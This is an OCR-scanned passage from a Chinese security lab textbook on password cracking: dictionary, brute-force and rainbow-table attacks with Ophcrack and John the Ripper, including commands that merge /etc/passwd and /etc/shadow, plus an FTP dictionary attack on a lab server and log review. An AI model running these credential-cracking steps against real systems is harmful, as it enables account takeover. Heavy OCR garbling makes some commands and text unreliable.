典 攻 击 的 方式 进行 攻击 ,可 以 看 到 无 法 攻击 成 功 , 原 因 是 字典 文件 中 不 包含 口令 
Al23DF ,如 果 在 字典 中 加 入 该 口令 , 则 可 破解 口令 。 
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r Diet Brute Hybrid Crack 
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Common letter substitutions (much. 


The Dictionary/Brute Mybrid Crack tests for passwords that are 
variations of the words in the word file. It finds passwords such as 
"Dana99" or "monkeys!^. This test is fast and finds жеек passwords. 


p Preconputed. 
(7] Enabled Hesh-File.... 


The Preconputed Crack tests for passwords against a precomputed hashes 
contained in а file or files. This test is very fast and finds 


set as the precomputed hashes. This crack only works against Windows 


p Brute Force Crack 
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[Р] Ера... : 
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The Brute Force Crack tests for passwords that are made up of the 
characters specified in the Character Set, It finds passwords such as 
test is slow and finds medium to strong passwords. Specify а 
Character set with more characters to crack stronger passwords. 


= 


图 3.6 设置 口令 破解 方式 


Filename |C:\pwdump7\1.txt 


Import from file 
Ө Fro» SM file 
Ө вов 4... 
@ From РЕПШМР ... 
Ө ов Unix shado... 


图 3.7 设置 口令 文件 导入 方式 
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0 B Dicti ДЗ 
12/20/2018 assword lor \test with Dictionary crack. 
12/20/2018 ctionary Audit 
12/20/2018 Auditing session completed. 


图 3.8 本 地 用 户口 令 被 破解 


9. 暴力 破解 

打开 Auditing Options For This Session 界面 ,在 Brute Force Crack 栏 中 勾 选 
Enabled, EA MÉY Character Set 栏 中 设置 暴力 破解 方式 ,设置 完成 后 单 击 OK 按钮 ,如 
图 3.9 所 示 。 


r Dictionary Crack 
V Enabled 
[7 Crack NTLM Passwords 
The Dictionary Crack tests for passwords that are the same as the words listed in the 
word fle. This test is very fast and finds the weakest passwords. 

p Dictionary/Brute Hybrid Crack. 


Г Enabled D у] Characters to prepend 
T^ Crack NTLM Passwords |2 т] Characters to append 


[^ Common letter substitutions [much slower 


The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in 
the word file. It finds passwords such as "DanaSS" or "monkeys!" This test is fast and 
finds weak passwords. 


Dictionary List 


Г. Precomputed 


Et Шии 


The Precomputed Crack tests for passwords against а precomputed hashes contained in 
айе or fles. This test is very fast and finds passwords created from the same character 
sel as the precomputed hashes. This crack only works against Windows LM passwords. 


r Brute Force Crack. 
ЕЕ Character Set 
alphabet + numbers E 
Language: 
Engish 241 siphabet + numbers + common symbols 
re albhabel« numbers + all symbols 


The Brute Force Crack tests for passwords that are made up of the characters specified 
in the Character Set It finds passwords such as "WeR 3phSs" or "vC5%69+12b". This 
test is slow and finds medium to strong passwords. Specify a character set with more 
characters to crack stronger passwords. 


e] 
图 3.9 设置 口令 破解 方式 为 暴力 破解 
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单 击 主 界面 工具 栏 上 的 Begin 图 标 开始 破解 ,等 待 一 段 时 间 可 以 看 到 口令 被 破解 。 
设置 不 同位 数 和 字符 集 的 口令 ,以 观察 利用 暴力 破解 方法 进行 口令 猜测 的 时 间 .。 
3.4 采用 彩虹 表 进行 口令 破解 实验 


3.4.1 实验 目的 


理解 彩虹 表 (Rainbow Table) 口 令 破解 的 原理 ,掌握 利用 Ophcrack 工具 进行 口令 提 
取 、 散 列表 加 载 和 口令 破解 的 方法 。 


3.4.2 实验 内 容 及 环境 


1. 实验 内 容 

本 实验 通过 使 用 开源 彩虹 表 破解 工具 Opherack 对 Windows 系统 环境 下 的 口令 进行 
破解 。 

2. 实验 环境 


主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 、Ophcrack 软件 和 彩虹 表 文 件 vista_ 
proba free. zip, 

彩虹 表 是 一 个 庞大 的 .针对 各 种 可 能 的 字母 组 合 预先 计算 好 的 哈 希 值 的 集合 ,其 各 种 
算法 都 有 ,可 以 快速 破解 各 种 密码 。 越 是 复杂 的 密码 ,需要 的 彩虹 表 就 越 大 ,主流 彩虹 表 
的 大 小 都 是 在 100GB 以 上 ,本 实验 采用 的 是 600MB 的 彩虹 表 , 它 只 能 破解 较为 简单 的 口 
令 , 破 解 复杂 的 口令 需要 下 载 更 大 的 彩虹 表 。 

Ophcrack 是 一 个 使 用 彩虹 表 来 破解 Windows 操作 系统 口令 散 列 的 程序 , 它 是 基于 
GPL 发 布 的 开源 程序 ,利用 内 嵌 的 工具 可 以 提取 Windows SAM 文件 的 散 列 值 进行 破 
解 。 对 于 LM(LAN Manager) 散 列 , 使 用 免费 的 彩虹 表 , 可 以 在 短 至 几 秒 内 破解 最 多 14 
个 英文 字母 的 口令 ,成 功率 达 99.9%。 对 于 Windows Vista 之 后 的 系统 ,SAM 中 已 经 不 
再 存储 LM 散 列 ,而 只 存储 NTLM 散 列 ,从 Ophcrack2. 3 版 开始 可 以 破解 NTLM 散 列 。 
对 于 NTLM 散 列 ,一般 的 彩虹 表 破 解 能 力 大 大 降低 ,本 实验 仅 针 对 7 位 小 写字 母 组 成 的 
口令 ,使 用 该 工具 可 以 在 较 短 时 间 内 破解 。 


3.4.3 实验 步骤 


1. 添加 账户 

在 系统 中 运行 cmd. exe, Н net user 命令 修改 test 用 户 的 口令 为 7 位 小 写字 母 口令 ， 
如 图 3.10 所 示 。 

2. 安装 运行 Opherack 

按 默认 配置 安装 Ophcrack ,运行 ophcrack. exe, 主 界面 如 图 3. 11 所 示 。 

з. 安装 彩虹 表 

将 彩虹 表 文 件 vista proba free. zip 解压 ,打开 Ophcrack, 单 击 工具 栏 上 的 Tables f£ 
钮 ,进入 彩虹 表 安 装 对 话 框 ,如 图 3. 12 所 示 .在 Tables 栏 中 选择 Vista probabilistic free. 
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[Б === cwindow em Te О | 
Microsoft Windows [版 本 6.1.7601] 
(BE (с) 2009 Microsoft Corporation. I EUH 


C:NUsersXlenouo»net user test pastest /add 
Я 功 完成 


C:NUsersN\lenouo> 


图 3. 10 添加 测试 用 户 


© ophcrack 7 


э { soa ; 
>d xd LJ © V \ 
Load Delete Save Tables Crack Help Exit About 
Progress | Statistics. | Preferences 
| User LM Hash NT Hash LM Pwd 1 LM Pwd 2 NT Pwd 
Table Directory Status Progress 
Preload waiting Brute force waiting Pwd found 0/0 Time elapsed: — [Oh On Os 


图 3.11 Ophcrack 主 界面 


单 击 Install 按钮 ,选择 彩虹 表 文 件 vista proba free 路 径 , 单 击 OK 按钮 。 
4. 选择 散 列 文件 加 载 方式 


在 Ophcrack 主 界面 上 , 单 击 load 图 标 , 在 其 下 拉 菜 单 中 选择 Local SAM with 


samdump2 散 列 加 载 方式 .如 图 3. 13 所 示 。 


从 SAM 文件 中 提取 口令 散 列 并 加 载 ,如 图 3. 14 所 示 。 
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图 3.12 
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图 3.14 


5. 利用 彩虹 表 进 行 口令 破解 
在 图 3.14 中 单 击 Crack 图 标 , 用 彩虹 表 进 行 口令 破解 。 在 破解 过 程 中 可 以 单 


加 载 口令 散 列 


Statistics 标签 ,查看 彩虹 表 的 状态 ,如 图 3.15 所 示 。 
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6. 口令 破解 成 功 
破解 结束 后 可 以 看 到 Ophcrack 成 功 破解 了 用 户 test 的 口令 ,如 图 3.16 所 示 。 请 读 
者 设置 不 同位 数 和 字符 集 的 口令 ,以 观察 利用 彩虹 表 进 行 口令 猜测 的 时 间 ,并 记录 。 


ооаото а 


Load Delete Save Tables Crack Exit 


Progress | Statistics | Preferences | 


User LM Hash NT Hash LM Pwd 1 
"disabled" Ad... 31d6cfe0d16a... 
"disabled" Gu... 31d6cfe0d16a... 
lenovo 31d6cfe0d16a... 
test b1f08c4da4d8... 


Table Directory Status 
b @ Vista рг... C:\Program Fil... 10096 in RAM 


Pwd found: Time elapsed: Oh 3m 19s 


图 3.16 利用 彩虹 表 成 功 破解 口令 


3.5 Linux 系统 口令 破解 实验 


3.5.1 实验 目的 
掌握 Linux 口令 散 列 的 提取 方法 ,掌握 使 用 John the Ripper 进行 口令 破解 的 方法 。 
3.5.2 实验 内 容 及 环境 


1. 实验 内 容 

本 实验 通过 使 用 John the Ripper 工具 完成 对 Linux 系统 环境 下 的 口令 散 列 的 破解 。 
需要 掌握 Linux 系统 环境 下 口令 散 列 的 提取 方法 ,以 及 使 用 John the Ripper 进行 口令 破 
解 的 过 程 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Ubuntu 14. 04 操作 系统 和 软件 John the Ripper 1. 8. 0。 
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John the Ripper 是 一 个 快速 的 口令 破解 工具 。 该 软件 支持 目前 大 多 数 的 加 密 算法 ， 
如 DES、MD4 和 MD5 等 ,可 用 于 破解 Windows, Linux 系统 口令 。John the Ripper 提供 
了 4 种 破解 模式 。 

1) 简单 破解 模式 (single crack mode) 

这 种 破解 模式 主要 针对 用 户 设 置 的 口令 跟 用 户 名 相同 或 只 是 用 户 名 的 简单 变形 ,如 
某 个 账号 为 admin, 口 令 是 admin888、admin123 等 。 在 使 用 这 种 破解 模式 时 ,John the 
Ripper 会 根据 口令 文件 中 的 用 户 名 进行 破解 ,并 且 基 于 用 户 名 使 用 多 种 字 词 变化 规则 进 
行 口令 猜测 ,以 增加 口令 破解 的 成 功率 。 

2) 字典 破解 模式 (wordlist crack mode) 

这 种 破解 模式 需要 用 户 指定 一 个 字典 文件 ,John the Ripper 读 取 字典 中 的 单词 进行 
破解 。John the Ripper 自 带 了 一 个 字典 文件 password. lst, 里 面包 含 了 一 些 经 常用 来 作 
为 口令 的 单词 。 

3) 增强 破解 模式 (incremental mode) 

也 即 暴力 破解 方式 ,这 种 方式 会 自动 尝试 所 有 可 能 的 字符 组 合 进行 口令 破解 ,破解 时 
间 较 长 。 

4) 外 挂 破 解 模式 (external mode) 

在 该 模式 下 用 户 可 以 使 用 自己 用 C 语言 编写 的 破解 程序 进行 口令 破解 。 


3.5.3 实验 步骤 


(1) 进入 Ubuntu 系统 ,以 root 用 户 身 份 执行 Linux 命令 useradd test ,添加 test 用 
P ,再 执行 passwd test 命令 ,更 改 用 户口 令 。 为 验证 暴力 破解 ,可 以 将 口令 更 改 为 6 位 纯 
数字 口令 ,如 图 З. 17 所 示 。 


OS® root@ubuntu: ~ 


root@ubuntu:~# useradd test 
rootQubuntu:-4 passwd test 

Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfuLLy 


rootQubuntu: it 


图 3.17 添加 测试 用 户 


(2) 获取 安装 包 John-1. 8. 0. tar. gz, 利 用 指令 tar -xvzf 解压 该 压缩 包 , 得 到 源 代码 ， 
如 图 3.18 所 示 。 

G) 进入 刚刚 解压 的 目录 下 ,阅读 README 和 DOC 目录 下 的 相关 帮助 文档 ,了 解 
软件 的 安装 和 使 用 方法 。 

(4) 进入 john-1. 8. 0/src 目录 ,依次 执行 make; make clean linux-x86-64 命令 ,其 中 
linux-x86-64 是 Linux 系统 类 型 ,可 以 根据 实际 情况 进行 选择 ,如 图 3. 19 所 示 。 
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© © root@ubuntu: /tmp 


root@ubuntu:~# cd /tmp 
rootQubuntu:/tmp£ ls -a 


config-err-GvxVNc 


ч 


john-1.8.0.tar .gz 
unity support test.0 


root@ubuntu: /tmp# tar -xvzf john-1.8.0.tar.gz 
Ө/КЕАРМЕ 
.0/doc/CHANGES 


.8. 


8 
8 
8 
8 
-8 
8 
8 
8 
8 


.0/doc/CONFIG 
.0/doc/CONTACT 
.0/doc/COPYING 
.0/doc/CREDITS 
.0/doc/EXAMPLES 
.0/doc/EXTERNAL 
.0/doc/FAQ 
.0/doc/INSTALL 


:得 到 John the Ripper 源 代码 


© © © root@ubuntu: /tmp/John-1.8.0/src 
root@ubuntu:~# cd 


ia 


rootQubuntu: 
rootQubuntu: 


(5) 编 i 
所 示 。 


ubuntu: 


doc 


README 


图 3.19 


成 后 进入 run 目录 ,可 以 看 到 该 目录 下 生成 了 


/tmp/john-1.8.0 


/tmp/john-1.8.0# ls -a 


run src 


/tmp/john-1.8.0# cd src 
/tmp/john-1.8.0/src# таке 


John the Ripper 源 代码 编译 和 软件 的 安装 


© © ©) root@ubuntu: /tmp/John-1.8.0/run 


rootQubuntu:-$ cd /tmp/john-1.8.0 
rootQubuntu:/tmp/john-1.8.04 ls -a 
. E README run 
rooteubuntu: /tmp/john-1.8.6# cd run 
rooteubuntu: /tmp/john-1.8.6/run# ls -a 
5 digits.chr 


doc 


ascii.chr 
rootQubuntu: /tmp/ john-1.8.0/runs li 


(6) 查看 帮助 文档 ， 


john 


john.conf 


src 


john. log mailer reLbench 
john .pot makechr unafs 
lm ascii.chr password.Lst unique 


图 3.20 编译 完成 John the Ripper 软件 


/etc/shadow > myshadow. 将 /etc/passwd 和 /etc/shadow 合 二 为 


中 ,用 于 将 用 户 名 和 加 密 后 的 口令 存储 在 一 个 文件 中 ,如 图 
(7) 进入 john/run 目录 下 ,运行 命令 开始 破解 Linux 口令 文件 ,前面 介 


- 些 可 执行 文件 ,如 图 3.20 


unshadow 


了 解 破解 命令 的 使 用 方式 。 输 入 命令 : . /unshadow /etc/passwd 


-到 文件 myshadow 


21 所 示 。 


4-5 


Hii John the 


Ripper 支持 4 种 破解 模式 ,我们 验证 其 中 的 字典 破解 模式 。 首 先 采 用 系统 默认 的 字典 文 
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© © root@ubuntu: /tmp/John-1.8.0/run 


root@ubuntu:~# cd /tmp/john-1.8.0 
root@ubuntu: /*тр/ }оһп-1.8.Ө0# ls -a 
S doc README run src 
和 /tmp/john-1.8.6# cd run 
цоо арры /tmp/john-1.8.6/run# ls -a 
digits.chr  john.log mailer reLbench unshadow 
john john.pot makechr unafs 


ascii.chr john.conf m ascii.chr password.Lst unique 

root@ubuntu: /tmp/john-1.8.0/run# ./unshadow /etc/passwd /etc/shadow >myshad 
ow 

root@ubuntu:/tmp/john-1.8.0/run# ls -a 

- digits.chr јоһп.109 mailer password.lst unique 

-- john john.pot makechr reLbench unshadow 
ascii.chr john.conf 1m ascii.chr myshadow unafs 

root@ubuntu: /tmp/ john-1.8.0/runi [| 


图 3.21 合并 /etc/passwd 和 /etc/shadow 


件 password. lst 进行 破解 ,如 图 3. 22 所 示 , 可 以 看 到 
户 , 其 中 test 用 户 的 口令 设置 比较 简单 ,很 容易 就 破解 
破解 。 


云 行 结果 提示 当前 系统 中 有 3 个 用 
出 来 了 ,其 他 两 个 用 户 的 口令 无 法 


© © © root@ubuntu: /tmp/John-1.8.0/run 

rootQubunt # cd /tmp/john-1.8.9/run/ 

rootQubunt tmp/john-1.8.0/runi ls -a 

- digits.chr  john.log mailer password.Lst unique 
cc john john .pot makechr reLbench unshadow 
ascii.chr john.conf lm ascii.chr myshadow unafs 

root@ubuntu: /tmp/john-1.8.6/run# ./john -w:password.lst myshadow 
Loaded 3 password hashes with 3 different salts (crypt, generic crypt(3) [?/64]) 
Remaining 2 password hashes with 2 different salts 

Press 'q' or Ctrl-C to abort, almost any other key for status 

0g 0:00:00:12 100% 09/5 292.0р/5 584.1c/s 584.1C/s !@#5%..555 

Session completed 

root@ubunt tmp/john-1.8.0/run# ./john -show myshadow 

test:12345 004:1004 home/test: 


1 password hash cracked, 2 left 
rootQubuntu: /tmp/ john-1.8.0/runi 


(8) 请 读者 在 系统 默认 的 字典 文件 password. Ist 中 增加 其 他 两 个 用 户 的 口令 ,重新 
进行 字典 攻击 ， 
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远程 服务 器 的 口令 破解 实验 


3.6.1 实验 目的 


掌握 对 远程 服务 器 口令 的 字典 攻击 方法 ,以 及 通过 查看 日 志 发 现 口令 攻击 的 方法 。 
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3.6.2 实验 内 容 及 环境 


1. 实验 内 容 

架设 FTP 服务 器 ,利用 远程 口令 枚 举 工具 进行 字典 攻击 ,并 通过 配置 服务 器 进行 日 
志 记 录 ,利用 日 志 分 析 口 令 枚 举 过 程 。 

2. 实验 环境 

实验 拓扑 如 图 3. 23 所 示 ,实验 需要 主流 配置 计算 机 两 台 , 一 台 作 为 FTP 服务器, 安 
装 Windows 7 操作 系统 和 FileZilla Server 软件 ; 另 一 台 作 为 攻击 机 ,安装 Windows 7 操 
作 系 统 和 Fscan 软件 ,IP 地 址 设置 如 图 3.23 所 示 。 


e 


攻击 机 FTP 服 务 器 
ІР; 192.168.188.6 IP; 192.168.188.8 


图 3.23 实验 拓扑 图 


FileZilla 是 免费 开源 的 FTP 软件 ,分 为 客户 端 版 本 和 服务 器 版 本 。FileZilla 客户 端 
具有 快速 ,界面 清晰 、 能 管理 多 站 点 等 特点 ,是 一 种 方便 高效 的 FTP 客户 端 工 具 ; 而 
FileZilla Server 则 是 一 个 小 巧 并 且 支 持 FTP #1 ЅЕТР 的 FTP 服务 器 软件 。 本 次 实验 利 
用 FileZilla 的 服务 器 版 本 软件 快速 搭建 一 个 FTP 服务 器 。 

Fscan: 是 基于 命令 行 的 FTP 弱 口 令 扫描 小 工具 ,其 速度 非常 快 , 且 使 用 简单 。 


3.6.8 实验 步骤 


1. 安装 FileZilla Server 软件 

E FTP 服务 器 上 安装 FileZilla Server 软件 ,安装 过 程 中 需要 设置 安装 路 径 、.FTP Wr 
听 端 口 ,按照 默认 选项 安装 完毕 后 ,打开 软件 ,首先 进入 连接 服务 器 界面 ,如 图 3. 24 所 示 ， 
输入 正确 参数 后 单 击 OK 按钮 ,进入 如 图 3. 25 所 示 的 FileZilla Server 主 界面 。 


图 3.24 连接 FTP 服务 器 


2. 添加 测试 用 户 
在 图 3. 25 中 依次 选择 菜单 Edit>Users, 或 单 击 工 具 栏 的 用 户 图 标 , 进 入 用 户 添 加 界 
面 ,如 图 3.26 所 示 。 单 击 Add 按钮 ,添加 用 户 test. 4J3& Password 选项 ,输入 测试 口令 。 


$35 口令 攻击 和 防护 


Е FileZilla Server (127.0.0.1) 


Не Server Edit ? 


18 656? [ea а- 
FileZilla Server version 0.9.41 beta 
opyright 2001-2012 by Tim Kosse (tim. kosseBfilezilla-project. org) 
onnecting to server. 
onnected, waiting for authentication 
[Logged on 


Obytesreceived 0B/s _ Obytessent OB/s 


图 3.25 FileZilla Server 3: Jf ilii 


Users 


Page: Account settings Users 
[v] Enable account 2 test 
Shared folders [V] Password: 

Speed Limits z 
IP Filter Group membership: 


Bypass userlimit of server 
Maximum connection count: |0 


Connection limit per IP: 0 


Force SSL for user login 


Law |] 
Rename 


Description 


You can enter some comments about the user 


图 3.26 用 户 添加 界面 


3. 配置 破解 字典 

将 ftpscan 工具 软件 复制 到 攻击 机 上 ,在 ftpscan 目录 中 ,找到 文件 username. dic 和 
password. dic ,为 验证 口令 字典 破解 过 程 , 将 刚 创建 的 FTP 用 户 的 用 户 名 和 口令 分 别 添 
加 在 这 两 个 文件 中 ,如 图 3. 27 和 图 3. 28 所 示 。 
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a (0&9 cm es 
| XP) (E) 格式 (O) SEV EAH 

|огас1е8 

mysql 

test 

lizdy 

sybase 

user 

| backup 

guest 

wwwadmin 

WWW 

access 

[account 

network 

[news 

data 

web 


(erem 


图 3.27 在 文件 username. dic 中 添加 新 增 用 户 名 信息 


图 3.28 在 文件 password. dic 中 添加 新 增 用 户口 令 信息 


4. 实施 口令 破解 

在 攻击 机 的 命令 行 界面 中 ,执行 命令 “ftpscan. exe 192. 168. 188. 8” 针 对 FileZilla 
FTP 服务 器 进行 在 线 破解 ,可 以 看 到 口令 破解 成 功 ,如 图 З. 29 所 示 。 

5. 配置 服务 器 日 志 记 录 

在 FileZilla FTP 服务 器 主 界面 ,选择 Edit>Settings 项 ,打开 服务 器 配置 对 话 框 , 单 击 左 
侧 列表 框 里 的 Logging, 进 入 日 志 配 置 界面 , 勾 选 Enable logging to file 选项 ,如 图 3. 30 所 示 。 
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ng: neus/abc 

ng: data/ahbc 

ng: guest/ftppa: 

ng: web/abc . 

ng: access/alpha . 
ng: account/alpha . 
ng: wwwadnin/ftppas 
ng: test/abc ... 
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FileZilla Server Options 


日 General settings 
Welcome mess. 
IP bindings 
IP Fiter 
Passive mode settir 
Security settings 
Miscellaneous 
Admin Interface зей 
Logging 
GSS Settings 
Speed Limits 
Filetransfer compres 
SSL/TLS settings 
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veb/f tppa: 
test/ftpp: 
test/ftppass 


对 FileZilla FTP 服务 器 进行 口令 破解 


~ ETE 
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口 


Enable loggng to fie 


Limit log Ве size to 


Logfile. 
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Log al to 'FieZila Server.log' 
Use a different logfile each day (example: fzs-2003-02-10.og) 
days 
log fies wil be saved in the "Logs" subfolder in the FieZila Server folder. 


配置 服务 器 日 志 记 录 


6. 查看 日 志文 件 中 的 口令 破解 记录 


在 配置 日 志 选 项 后 ,再 次 从 攻击 机 进行 口令 破解 尝试 。 


进入 FileZilla FTP 服务 器 安 


装 目录 下 的 log 子 目录 ,默认 路 径 为 C:\Program File\ FileZilla Server\Logs, 打开 
FileZilla Server. Logs 文件 ,可 以 看 到 大 量 来 自 同一 IP 地 址 的 连接 尝 


所 示 。 


试 记 录 , 如 图 3. 31 
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В ғаегша server.log - 记事 本 
ЗЕ) RHO МО) 
(002560) 2018-9-14 9:19: logged Е 188.6)» 228-written by Tim Kosse (Тіт.Коѕ: |а] 
(002560) 2018-9-14 9:19: logged - 188.6)» 228 Please visit http://sourcefor:—| 
(802561) 2018-9-14 9:19: logged -168.188.6)> Connected, sending welcome messag: 
(002561) 2018-9-14 9:19: logged - 188.6)» 228-Е11е2111а Server version 8.9.. 
(882561) 2018-9-14 9:19: logged i -168.188.6)» 220-written by Tim Kosse (Tin.Kos: 
(002561) 2018-9-14 9:19: logged i z 188.6)» 220 Please visit http://sourcefor: 
(802562) 2018-9-14 9:19: logged i -168.188.6)» Connected, sending welcome messag: 
(002562) 2018-9-14 9:19: logged i . 188.6)» 228-FileZilla Server version 0.9.. 
(002562) 2018-9-14 9:19: logged . 188.6)> 220-written by Tim Kosse (Tim.Kos: 
2018-9-14 9:19: logged А 188.6)» 228 Please visit http://sourcefor: 
2018-9-14 9:19: logged i .168.188.6)» Connected, sending welcome messagi 
2018-9-14 9:19: logged i . 188.6)» 220-FileZilla Server version 0.9.. 
2018-9-14 9:19: logged x 188.6)» 220-written by Tim Kosse (Tim.Kos: 
2018-9-14 9:19: logged -168.188.6)» 220 Please visit http://sourcefor 
2018-9-14 9:19: logged i - 188.6)? Connected, sending welcome messagl 
(002565) 2018-9-14 9:19: logged i - 188.6)» 220-FileZilla Server version 8.9.. 
(002565) 2018-9-14 9:19: logged - 188.6)» 220-written by Tim Kosse (Tim.Kos: 
(002564) 2018-9-14 9:19: logged i А 188.6)» 220 Please visit http://sourcefor: 
(002565) 2018-9-14 9:19: logged x 188.6)> Connected, sending welcome nessag: 
(002565) 2018-9-14 9:19: logged - 188.6)» 220-FileZilla Server version 9-9 - (ul 


[«] т ] |>] 


图 3.31 查看 日 志文 件 


3.7 练 习 题 


(1) 列举 一 两 种 本 书 未 介绍 的 本 地 口令 破解 工具 ,通过 实验 掌握 其 使 用 方法 ,记录 实 

(2) 在 3.4 节 的 实验 中 ,由 于 Windows 7 系统 不 存储 LM 散 列 ,无 法 进行 针对 LM fi 
列 的 破解 实验 。 请 在 Windows XP 系统 环境 下 安装 Ophcrack 工具 ,通过 实验 体会 
Ophcrack 破解 LM 散 列 的 难度 ,并 与 对 NTLM 散 列 的 破解 难度 进行 对 比 。 

(3) 在 3. 6 节 的 实验 中 ,进行 FileZilla FTP 服务 器 口令 远程 破解 的 同时 ,利用 
Wireshark 嗅 探 器 ,在 同一 网 段 进行 监听 ,以 查看 用 户 名 和 口令 是 否 明文 发 送 。 

(4) 在 Linux 中 ,在 默认 字典 文件 中 增加 系统 用 户 的 口令 ,用 John the Ripper 的 字典 
攻击 方法 进行 破解 ,验证 是 否 能 破解 成 功 所 有 用 户口 令 。 

(5) 在 Linux 中 ,增加 一 个 用 户 ,设置 其 口令 为 其 用 户 名 的 变形 ,请 采用 简单 (single) 
破解 方法 进行 破解 ,验证 是 否 能 够 成 功 破解 。 
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Windows 安全 机 制 


操作 系统 是 管理 计算 机 硬 软件 资源 ,控制 程序 执行 .改善 人 机 界面 ,提供 各 种 服务 、 合 
理 组 织 计 算 机 工作 流程 为 用 户 提供 良好 运行 环境 的 最 基本 的 系统 软件 。 操 作 系统 在 信 
息 系统 中 占有 特殊 的 重要 地 位 , 它 是 软件 系统 的 核心 ,是 其 他 各 种 软件 的 基础 运行 平台 ， 
车 没有 操作 系统 安全 机 制 的 支持 ,就 不 可 能 具有 真正 的 软件 安全 性 。 同 时 在 网 络 环境 中 ， 
网 络 的 安全 性 依赖 于 各 主机 系统 的 安全 性 ,而 主机 系统 的 安全 性 又 依赖 于 其 操作 系统 的 
安全 性 。 因 此 ,从 计算 机 信息 系统 的 组 成 角度 分 析 ,操作 系统 的 安全 性 在 计算 机 信息 系统 
的 整体 安全 性 中 具有 至 关 重 要 的 作用 ,操作 系统 为 整个 计算 机 信息 系统 提供 底层 系统 级 
的 安全 保障 ,没有 操作 系统 的 安全 性 ,信息 系统 的 安全 性 是 没有 基础 的 。 

Windows 系统 是 目前 世界 上 用 户 最 多 、 兼 容 性 最 强 的 操作 系统 ,在 我 国 被 广泛 作为 
企业 、 政 府 部 门 以 及 个 人 计算 机 的 系统 平台 ,从 Windows 2000 开始 ,Windows 系列 的 操 
作 系 统 自 身 就 提供 多 种 安全 机 制 以 增强 计算 机 系统 的 安全 防护 能 力 ,这 些 安全 机 制 包 括 
账户 管理 ,访问 控制 ,安全 审计 ,设备 控制 和 入 侵 防 范 等 。 本 章 介 绍 Windows 7 中 的 安全 
机 制 。 


4.1 Windows 安全 机 制 概述 


4.1.1 账户 管理 


Windows 的 安全 基础 是 账户 管理 。 使 用 计算 机 的 用 户 都 需要 设置 用 户 账 户 ,设置 用 
户 账户 的 目的 是 告诉 操作 系统 该 用 户 是 否 可 以 登录 ,可 以 访问 哪些 文件 和 资源 ,可 以 对 计 
算 机 进行 哪些 更 改 , 其 重要 性 不 言 而 喻 。 

Windows 操作 系统 采取 与 用 户 交 互 的 方式 创建 用 户 账户 ,需要 输入 用 户 名 和 口令 ， 
然后 ,Windows 操作 系统 进行 三 项 重要 工作 。 首 先 , 操 作 系 统 会 根据 用 户 输入 的 用 户 名 
创建 一 个 专用 的 配置 文件 ,以 保存 该 用 户 登 录 后 加 载 的 环境 设置 和 文件 等 ,如 屏幕 颜色 、 
鼠标 设置 、 网 络 连接 和 程序 设置 等 。 其 次 ,为 用 户 账 户 生成 一 个 唯一 的 安全 标志 符 (SID， 
Security Identifiers) ,并 根据 SID 对 应 的 安全 级 别 给 用 户 指派 相应 的 访问 权限 。 最 后 ,将 
该 账户 的 用 户 名 和 口令 等 信息 加 密 后 保存 在 账户 安全 管理 器 (SAM, Security Account 
Manager) 数 据 库 中 。 对 于 本 地 账户 ,用 户 身 份 信息 (用 户 名 和 密码 等 ) 保 存在 本 地 SAM 
中 ,而 对 于 域 环境 的 账户 ,其 身份 信息 保存 在 域 控制 器 的 SAM 数据 库 中 。 

1. 用 户 配置 文件 

当 用 户 成 功 登 录 Windows 操作 系统 后 ,操作 系统 会 自动 生成 用 户 自己 定制 的 桌面 、 


`o 信息 系统 安全 实验 教程 


开始 菜单 .我 的 文档 等 。 那 么 ,这 些 个 性 化 的 桌面 .开始 菜单 、 我 的 文档 等 来 自 何 处 ”其 
实 , 用 户 看 到 的 一 切 均 是 用 户 配置 文件 的 一 部 分 。 

用 户 配 置 文件 用 于 定义 用 户 的 工作 环境 ,包括 桌面 显示 设置 .应 用 程序 设置 以 及 网 络 
连接 等 。 用 户 配置 文件 是 一 个 层次 结构 ,表现 为 一 个 文件 夹 。 在 配置 文件 夹 下 有 子 文件 
夹 和 一 些 快捷 方式 的 文件 。 

用 户 配置 文件 夹 的 层次 结构 也 称 为 用 户 配置 文件 的 名 称 空间 , Windows 7 与 
Windows XP 系统 的 名 称 空间 存在 较 大 区 别 。 了 解 这 些 区 别 对 于 理解 用 户 最 小 特权 非常 
重要 ,同时 也 是 第 三 方 应 用 程序 遇 到 兼容 性 问题 的 一 个 主要 原因 。 因 此 ,以 Windows ХР 
和 Windows 7 为 例 , 介 绍 这 两 个 名 称 空间 的 不 同 。 

1) Windows XP 用 户 配置 文件 的 名 称 空间 

在 Windows XP( 及 以 前 的 版 本 ?中 ,用 户 配 置 文件 的 名 称 空间 主要 包括 以 下 几 类 。 

CD 本 地 用 户 配置 文件 夹 。 位 于 %SystemDrive%\Documents and Settings 目录 下 。 

(2) 用 户 专 有 配置 文件 夹 。 每 个 在 本 机 上 登录 过 的 用 户 , 都 有 一 个 以 用 户 名 为 名 的 
配置 文件 夹 ,位 于 “%SystemDrive%\Documents and Settings\ 用 户 名 ”目录 下 。 

G) 通用 配置 文件 夹 。 位 于 “%SystemDrive%\Documents and Settings\All Users" 
目录 下 ,其 中 包含 了 一 些 通用 的 项 目 , 例 如 ,配置 登录 到 本 地 计算 机 的 用 户 桌 面 或 开始 菜 
单 中 显示 的 程序 快捷 方式 .桌面 图 标 等 。 通 过 对 配置 文件 的 内 容 进 行 定制 ,可 以 让 所 有 登 
录 到 本 地 计算 机 的 用 户 享 有 相同 的 程序 快捷 方式 和 桌面 图 标 等 。 

(4) 默认 配置 文件 夹 。 位 于 “% SystemDrive?5 N Documents and Settings\Default 
User” 目 录 下 ,主要 为 新 用 户 提供 创建 配置 文件 的 模板 。 当 用 户 首次 登录 时 ,Windows 操 
作 系 统 会 自动 加 载 默 认 的 用 户 配 置 文件 ,并 将 其 复制 到 “% SystemDrive%\Documents 
and Settings\ 用 户 名 ”目录 下 .作为 该 用 户 的 配置 文件 。 

配置 文件 夹 内 的 子 文件 夹 主要 保存 用 户 应 用 程序 设置 和 用 户 数据 ,其 中 有 一 些 是 隐 
藏 文件 。 与 安全 相关 的 子 文件 夹 包括 以 下 几 部 分 。 

(1) Application Data 文件 夹 : 包含 应 用 程序 文件 及 数据 ,如 软件 的 MSI 安装 文 
件 等 。 

(2) Cookies 文件 夹 : Cookies 是 一 种 能 够 让 网 站 服务 器 把 少量 数据 存储 到 客户 端 硬 
盘 或 内 存 中 的 技术 。 当 你 浏览 有 些 网 站 时 ,网 站 的 Web 服务 器 会 在 客户 端 硬盘 或 内 存 上 
